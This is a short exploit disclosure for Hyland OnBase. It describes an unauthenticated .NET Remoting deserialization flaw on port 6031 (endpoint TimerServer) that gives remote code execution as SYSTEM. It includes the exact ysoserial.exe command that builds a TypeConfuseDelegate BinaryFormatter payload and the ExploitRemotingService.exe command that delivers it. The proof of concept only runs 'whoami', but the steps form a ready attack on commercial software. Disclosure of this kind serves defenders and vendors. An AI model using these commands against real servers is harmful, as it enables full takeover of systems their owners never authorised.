Exploit Title: Hyland Software OnBase - Unauthenticated Remote Code Execution via .NET Deserialization
Vendor Homepage: https://www.hyland.com/
The .NET Remoting TCP channel registered on port 6031 is affected by an unauthenticated deserialization vulnerability that leads to blind Remote Code Execution under the context of the highest privileged Windows account NT AUTHORITY\SYSTEM, resulting in full compromise of the underlying system that the OnBase Timers service is installed in.
Using ysoserial.exe, the BinaryFormatter deserialization payload is generated with the gadget TypeConfuseDelegate to trigger Remote Code Execution on the server. As a proof of concept, the command provided will have the remote server execute the “whoami” command locally and store the command output of the account currently running the service into the file located at “C:\temp\whoami.txt”.
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c 'whoami > c:\temp\whoami.txt' -o base64Using ExploitRemotingService.exe, the generated base64 encoded payload from ysoserial.exe is passed as an argument and sent as a raw deserialization payload to the .NET Remoting TCP Channel on port 6031 with the known URI endpoint TimerServer that was registered inside Hyland.Core.Timers.dll.
ExploitRemotingService.exe tcp://<onbase-server>:6031/TimerServer raw <ysoserial-payload>